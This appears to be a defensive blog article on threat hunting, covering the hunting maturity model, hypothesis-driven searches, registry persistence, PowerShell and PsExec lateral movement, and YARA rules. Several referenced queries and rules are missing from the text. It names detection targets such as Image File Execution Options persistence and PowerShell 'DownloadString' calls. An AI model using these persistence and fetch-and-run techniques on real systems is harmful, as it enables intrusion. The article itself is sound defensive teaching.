The average "Dwell Time" (the time a hacker remains undetected in a network) is over 200 days. Why? Because teams rely on Passive Defense: installing Antivirus/EDR and "waiting for the red light to blink".
Threat Hunting is Active Defense. It assumes the breach has already happened. It is the human-driven search for malicious actors who have bypassed your automated defenses.
The Hunter's Mindset
A SOC Analyst looks at alerts. A Threat Hunter looks at data. They ask: "If I were an APT actor using PowerShell to move laterally, what would the logs look like?" Then, they go search for that specific pattern, even if no alert triggered.
1. The Hunting Maturity Model (HMM)
Before diving into techniques, organizations must understand where they stand.
| Level | Name | Description |
|---|---|---|
| HMM0 | Initial | Relies purely on automated alerts (SIEM/AV). No hunting. |
| HMM1 | Minimal | Routine log review. "Checking the dashboard". |
| HMM2 | Procedural | Following predefined hunting procedures manually. |
| HMM3 | Innovative | Creating NEW hunting procedures based on fresh intelligence. |
| HMM4 | Leading | Automating the new successful hunts into the SIEM. |
2. Hypothesis-Driven Hunting
You don't just "look around". You use the Scientific Method.
- Observation: "I read a report that APT29 uses 'Sticky Keys' persistence."
- Hypothesis: "If APT29 is in my network, I will see registry modifications to
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options." - Hunt: Query the EDR/SIEM for that specific registry key change across 5,000 endpoints.
- Validation: Did we find it? If yes -> Incident Response. If no -> The hypothesis is disproven (for now).
3. Hunting for Persistence (The Registry)
Hackers want to stay. The most common way is the Windows Registry "Run" keys.
3.1. The Usual Suspects
Query your EDR (CrowdStrike/SentinelOne) or SIEM (Splunk/Elastic) for additions to:
3.2. Splunk Search (SPL) Example
Here is a real SPL query to find rare executable names running from the AppData folder (a common malware hiding spot).
Explanation:
EventCode=1: Process Creation.
regex: Looks for .exe files running strictly inside AppData.
where count < 5: This is key. Malware is "rare". `Chrome.exe` runs on 5,000 machines. `Evil.exe` runs on 1. We filter for the outliers.
4. Hunting for Lateral Movement
Once inside, they move. They map the network (Discovery) and jump to the Domain Controller.
4.1. Powershell Hunting
PowerShell is the weapon of choice. Enable Script Block Logging (Event ID 4104) on your Domain Controller. Then hunt for "DownloadString":
4.2. PsExec & SMB
PsExec (Sysinternals) creates a named pipe. Look for Event ID 5140 (Share Accessed) or 5145 (Named Pipe).
IoA (Indicator of Attack): A service being created remotely.
5. Indicators of Compromise (IoC) vs Indicators of Attack (IoA)
This is crucial distinction for hunters.
- IoC (Static): "The file hash is
a1b2c3...". This is useful but brittle. If the hacker changes 1 bit, the hash changes (Pyramid of Pain). - IoA (Behavioral): "Word.exe spawned PowerShell.exe". This is resilient. It doesn't matter what the hash is; MS Word should NEVER open a terminal.
6. YARA Rules: Custom Hunting
YARA is "RegEx for binaries". You write a rule, and scan your files/memory for it.
If you find a suspicious file that your AV missed, write a YARA rule for unique strings inside it, then scan your entire fleet. You might find 5 more infections.
Key Takeaway
Threat Hunting is a loop. You hunt -> You find something -> You create a rule to automate detection -> You hunt for something else. Automate the known; hunt the unknown.